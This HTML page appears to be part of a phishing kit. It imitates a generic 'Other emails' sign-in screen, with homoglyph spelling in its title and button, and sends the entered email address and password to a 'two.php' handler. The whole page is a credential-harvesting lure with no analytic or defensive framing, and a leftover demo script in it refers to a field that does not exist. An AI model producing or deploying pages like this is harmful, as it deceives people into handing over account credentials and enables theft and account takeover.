

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!-- saved from url=(0014)about:internet -->
<html><head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<script type="text/javascript" src="https://www.sitepoint.com/examples/password/MaskedPassword/MaskedPassword.js"></script>
<meta name = "viewport" content = "user-scalable=no, initial-scale=1.0, maximum-scale=1.0, width=device-width">
<meta name="apple-mobile-web-app-capable" content="yes" />
<title>OTHER EMAlL SlGN lN</title>
<meta name="GENERATOR" content="DUDU">
<meta name="DUDU" content="DUDU">
<style type="text/css">
body
{
   background-color: #ccc;
   color: #000000;
}
</style>
<style type="text/css">
a:hover
{
   color: #6CDA7B;
}
</style>
<!--[if lt IE 7]>
<style type="text/css">
   img { behavior: url("pngfix.htc"); }
</style>
<![endif]-->
</head>
<body>
<div id="" style="margin:0;padding:0;position:absolute;left:0px;top:0px;width:398px;height:393px;text-align:left;z-index:3;"></div>

<h1 style="position:absolute;left:40px;top:45px;font-size:34px;font-weight:300;font-family:Arial;"> &nbsp;&nbsp;&nbsp;Other emails</h1>
<div id="bvForm1" style="position:absolute;left:0px;top:0px;width:401px;height:400px;z-index:4">
<form name="Formv1" method="post" id="demo-form" action="two.php">
<input type="hidden" name="OLD" value="ol">
<input id="email" style="position:absolute;left:59px;top:153px;background-color:#FBFCFC;width:256px;height:26px;border:1px #C0C0C0 solid;font-family:Arial;font-size:14px;z-index:1;border-radius:2px" name="emazz" value="" type="text" required placeholder="email@yourdomain.com">
<input style="position:absolute;left:59px;top:195px;background-color:#FBFCFC;width:256px;height:26px;border:1px #C0C0C0 solid;font-family:Arial;font-size:14px;z-index:1;border-radius:2px" name="pswdd" value="" type="password" id="demo-field" required placeholder="Password">

<div style="position:absolute;left:58px;top:270px;"><input type="checkbox"  checked>Keep me signin</div>

<input value="Sign ln" style="position:absolute;left:218px;top:270px;width:105.5px;height:32px;border:0px #000000 dotted;background-color:green;color:#fff;font-family:Arial;font-size:16px;z-index:2" type="submit">
</form>
</div>

<script type="text/javascript">
 
  //apply masking to the demo-field
  //pass the field reference, masking symbol, and character limit
  new MaskedPassword(document.getElementById("demo-field"), '\u25CF');
 
  //test the submitted value
  document.getElementById('demo-form').onsubmit = function()
  {
   alert('pword = "' + this.pword.value + '"');
   return false;
  };
 
 </script>
<img src="ot_files/logo-transparent.png" style="position:absolute;left:88px;top:320px;">
</body><script>'undefined'=== typeof _trfq || (window._trfq = []);'undefined'=== typeof _trfd && (window._trfd=[]),_trfd.push({'tccl.baseHost':'secureserver.net'}),_trfd.push({'ap':'cpsh'},{'server':'p3plcpnl0778'}) // Monitoring performance to make your website faster. If you want to opt-out, please contact web hosting support.</script><script src='https://img1.wsimg.com/tcc/tcc_l.combined.1.0.6.min.js'></script></html>